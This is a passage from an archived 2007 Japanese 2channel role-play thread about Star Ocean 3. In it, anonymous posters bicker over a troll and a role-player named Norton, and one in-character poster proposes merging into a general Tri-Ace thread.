本当に違うなら続けてていいんじゃないか

142 :以上、自作自演でした。:2007/10/18(木) 08:52:44
>139>141
ノートンいまさら見苦しいよノートン

143 :以上、自作自演でした。:2007/10/18(木) 10:26:08
まず平仮名読みにくい。バカにしてんのか。
ネルスレがセク質まみれっていっても、あそこ
他キャラの参加禁止だろ。

144 :以上、自作自演でした。:2007/10/18(木) 10:41:14
ウホッ

145 :以上、自作自演でした。:2007/10/18(木) 11:53:00
ノートンって結局荒らしと大差ないんじゃん?
粘着とは別人で本心からよかれと思ってやったとしても、
>>1は読まない、スレ主や古参の意向を無視して勝手にageる。
越境は微妙なとこだけど。

146 :以上、自作自演でした。:2007/10/18(木) 12:04:13
>>145=マリア

147 :以上、自作自演でした。:2007/10/18(木) 12:25:24
ネルスレで確か初めのネルは他キャラ禁止って言ってたけど、
二人めのネルは禁止しないと言ってた気がする
実際フェイト来てたし
まぁノートンは要らなかったけどな!

148 :以上、自作自演でした。:2007/10/18(木) 12:27:37
ゴメンナサイ下げ忘れた…orz

149 :以上、自作自演でした。:2007/10/18(木) 12:55:30
>>146
当たらないエスパーm9(^Д^)プギャー!!

150 :以上、自作自演でした。:2007/10/18(木) 13:18:11
>>139
別に俺は構わんよ。
やる気があるなら続ければいいだろ。


151 :以上、自作自演でした。:2007/10/18(木) 13:22:50
北風の相談スレでも借りてマリア呼び出せればいいんだが

152 :以上、自作自演でした。:2007/10/18(木) 14:23:44
>>149
マリアさんこんにちは

153 :以上、自作自演でした。:2007/10/18(木) 14:43:26
マジで職探した方が……;^ω^

154 :クリフ・フィッター:2007/10/18(木) 19:54:19
えらく盛り上がってると思えばよぉ、なんてこった…

155 :以上、自作自演でした。:2007/10/18(木) 20:07:45
助けてアニキ!

156 :リーベル:2007/10/18(木) 20:25:22
リーダーが居なくなって俺の存在意義が…orz

157 :り−べノレ:2007/10/18(木) 21:11:39
ははは

158 :以上、自作自演でした。:2007/10/19(金) 18:44:17
阿部マリア

159 :リーベル:2007/10/19(金) 22:37:55
>>157
ペッ!

>>158
高樹マリア

160 :以上、自作自演でした。:2007/10/20(土) 11:45:48
ネルスレにマリア来てるよ

161 :以上、自作自演でした。:2007/10/20(土) 19:49:35
もはやこのスレには荒らししか残っていないのか

162 :以上、自作自演でした。:2007/10/21(日) 00:24:13
その前にお前sageて無いだろ

163 :以上、自作自演でした。:2007/10/21(日) 00:26:04
荒らしもアレだが、それに反応してるお前らもどうかと思うが

164 :以上、自作自演でした。:2007/10/21(日) 15:54:24
 


165 :以上、自作自演でした。:2007/10/21(日) 18:08:23
356 名前:以上、自作自演でした。 投稿日:2007/10/21(日) 18:05:58
あーあ
さっさと辞める宣言した方が良いのかな
あの状況じゃもう元居た人誰も待ってくれてなんかないだろうし
どうしようかな

とりあえず暫くスレ見ないで後から様子見るか
つーかあんだけ腹割って話してもコレなのな
自分のスレブクマから外してやんよ
お前らの話してる事なんか目に入りませんwwwwざまぁwwwwwww

166 :以上、自作自演でした。:2007/10/21(日) 19:08:47
当たらないエスパー乙
同じようなスレなら幾らでもあるだろ

167 :以上、自作自演でした。:2007/10/21(日) 19:13:03
>>166
マリア乙

168 :以上、自作自演でした。:2007/10/21(日) 20:25:54
>>165がマリアならこのスレはブックマークから外してるんだろ
矛盾してないかw

169 :以上、自作自演でした。:2007/10/21(日) 20:39:47
で、名無しでなに遊んでるんだマリアよ?

170 :以上、自作自演でした。:2007/10/21(日) 21:53:43
凄いコンプレックスなんだな

171 :ノートン ◆b/yNrE0IcM :2007/10/22(月) 00:47:36
現地人の皆様に平和的な話し合いをしに来ましたよ

とりあえずオレ様の登場は悪かった。
確かに、フェイトすらいないのに本編でマリアと関わってないレゼルブ人が
出るのはマズイよな・・・
あと預言書も原文のままひらがなで申し訳ない。

で・・・ここでちょいと提案なんだが、人口の分散やら荒らしやら
何やら惑星レベルの問題が起きてるんで、
トライエース総合ってのはどうだろうか?
このままのマリア団だとリーダーがいないと進まないだろうし
神界も神界で荒れてるらしいしシーハーツはセク質だし。

応答願う

172 :以上、自作自演でした。:2007/10/22(月) 07:51:00
とりあえずあの靴の裏にくっついたガムみたいなやつが消えるまでは入らないと

173 :以上、自作自演でした。:2007/10/22(月) 16:22:33
日本語でおk

174 :以上、自作自演でした。:2007/10/22(月) 17:11:30
ノートンが謝るなんてキャラぶち壊しな気もするんだが。

175 :以上、自作自演でした。:2007/10/22(月) 17:59:42
そこでウィルスバスター導入ですよ

176 :以上、自作自演でした。:2007/10/22(月) 19:07:28
ある場所でこの人しっかりと謝ってるよ・・許してやろうよ

177 :以上、自作自演でした。:2007/10/22(月) 22:02:13
以上、すべて自作自演でした。

178 :以上、自作自演でした。:2007/10/24(水) 03:18:49
もうだめだねここも

179 :以上、自作自演でした。:2007/10/24(水) 03:39:40
ここまで俺の自演…っと。



あぁ〜長かった…そして疲れた〜

180 :FD人:2007/10/24(水) 23:26:46
エターナルスフィアをご利用の皆様、こんばんは。
長くご利用頂きまして大変ありがとうございます。
今日は訳あってこの姿での登場となることを
どうかお許しください。

本題に入りますが、先週より大規模なエラーが発生し
銀河系の大半が沈黙してしまった状態です。
修正パッチなのか、悪意あるFD人の仕業なのか、AIの暴走なのか
原因は不明ですが、この区域やエリクールだけでなく
神界までもが機能停止し、エターナルスフィアそのものが
機能していません。

そこで、匿名でご参加の皆様に相談ですが
エターナルスフィアのバージョンを更新するのはどうでしょうか?
SO3とか神界とか分けるのではなく、いっそのことトライエース総合にすると
参加人数の増加や消えたデータの復元を望めるのではないかと
考えております。

匿名で参加なさってる方々の総数や、活動の望みのあるAIの数などにより
企画倒れになってしまう恐れも高いですが、このまま機能停止させるのは
惜しいと思い、勝手ながら皆様にメッセージを送りました。

返事をいただけると幸いです───――

181 :以上、自作自演でした。:2007/10/25(木) 00:14:52
そんなことよりエビフライ食べたい

182 :以上、自作自演でした。:2007/10/25(木) 01:06:49
>>180
うざい

183 :以上、自作自演でした。:2007/10/25(木) 01:43:18
>180
バイバイ

184 :以上、自作自演でした。:2007/10/31(水) 16:18:42
そろそろ大丈夫だろ、キャラハンかもん

185 :以上、自作自演でした。:2007/10/31(水) 22:06:51
>184
具体的に誰を希望してるのかな?

186 :以上、自作自演でした。:2007/10/31(水) 23:25:34
so2が活動しててso3が何で死んでるんだよw

187 :以上、自作自演でした。:2007/11/01(木) 00:03:43
SO2のスレあったのか

188 :以上、自作自演でした。:2007/11/01(木) 00:16:07
>>184まだへばりついてたんかマリア

189 :以上、自作自演でした。:2007/11/01(木) 02:41:35
>>187
なりきりネタの方にある

190 :以上、自作自演でした。:2007/11/01(木) 08:33:17
>>188
まだへばり付いてるのか朝から晩まで

191 :以上、自作自演でした。:2007/11/01(木) 11:17:26
>190
マリアさんこんいちわ

192 :以上、自作自演でした。:2007/11/01(木) 22:42:46
キャラハンが来ればな…

193 :以上、自作自演でした。:2007/11/01(木) 23:18:29
新スレ立てないと駄目だと思います この状況では誰も来ません 削除依頼を出したほうがよろしいと思います

それにしても、粘着さんはマリアさんのことが大好きで大好きで大好きで1日中いるんですね
貴方の目にはどんな名前も「マリア」に見えるのですか?それはマリアさんが好きなあまりに貴方の頭が覚醒したのです
私もマリアさんは好きですけど、貴方の愛情には到底及びません・・貴方の頭は特別です

私も含めてこれからもずっと皆さんを「マリア」と呼ぶんですよね? 呼ぶんですよね?
その貴方以外誰も持たない貴重な頭を大切にしてくださいね いつかマリアさんと結婚できますよ
でも、男の人を「マリア」と言わないように アッーだと思われますから

194 :以上、自作自演でした。:2007/11/02(金) 01:13:54
2chでこんなに真面目に語りだしちゃうのもアホ臭いと思うけど

195 :以上、自作自演でした。:2007/11/03(土) 02:04:02
もう書き込むなよ…飯が不味くなる

にちゃあって粘着されるとさ

196 :以上、自作自演でした。:2007/11/04(日) 02:14:33
>>193
オマエ痛すぎw

197 :以上、自作自演でした。:2007/11/06(火) 12:14:53
so2のスレのキャラハンの中の人は、このスレのマリアの中の人と同じ人?
何か似てるんだが

198 :以上、自作自演でした。:2007/11/06(火) 12:32:27
違うって

199 :以上、自作自演でした。:2007/11/06(火) 23:16:05
so2なんてあるのか?

200 :以上、自作自演でした。:2007/11/07(水) 23:20:29
あれ 200?

201 :以上、自作自演でした。:2007/11/08(木) 09:09:30
__
    ̄ ̄ ̄二二ニ=-
'''''""" ̄ ̄
           -=ニニニニ=-


                          /⌒ヽ   _,,-''"
                       _  ,(^ω^ ) ,-''";  ;,
                         / ,_O_,,-''"'; ', :' ;; ;,'
                     (.゙ー'''", ;,; ' ; ;;  ':  ,'
                   _,,-','", ;: ' ; :, ': ,:    :'  ┼ヽ  -|r‐、. レ |
                _,,-','", ;: ' ; :, ': ,:    :'     d⌒) ./| _ノ  __ノ

202 :以上、自作自演でした。:2007/11/17(土) 21:06:52
誰かがSO2のスレなんて言い出すからむこうにも嵐が湧いてたぞ

203 :以上、自作自演でした。:2007/11/28(水) 21:32:48
誰か

204 :以上、自作自演でした。:2007/11/29(木) 11:06:13
ハイ 何でしょう?

205 :以上、自作自演でした。:2007/12/01(土) 19:02:38
おろっ?再会してたんだ。    早くSO1やりたい・・・

206 :以上、自作自演でした。:2007/12/02(日) 16:34:57
外部って手段も残ってたんだがなぁ。

207 :以上、自作自演でした。:2007/12/02(日) 17:02:40
太陽に総合あるしな

208 :以上、自作自演でした。:2007/12/02(日) 23:07:04
すっかりキャラハンもいなくなったこのスレを保守してまで、おまいらは誰を待ってるんだ?

209 :栗腐:2007/12/03(月) 00:27:31
おう!!待たせたな。頼れる兄貴の登場だぜ!!
んじゃ早速レス返してくとするか。

>>208
とか何とか言いつつも、このスレ覗きに来た上に
ちゃっかり書き込みまでして行ってくれたアンタに乾杯…。













いや、まぁその…なんだ……色々スマンかったな…。

210 :以上、自作自演でした。:2007/12/03(月) 03:20:22
このスレまだあったのか…

211 :以上、自作自演でした。:2007/12/05(水) 20:57:02
荒らしまだ居るのか?

212 :以上、自作自演でした。:2007/12/06(木) 01:10:43
キャラハンやキャラハン擁護の書き込みがあると飛んでくるよ

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)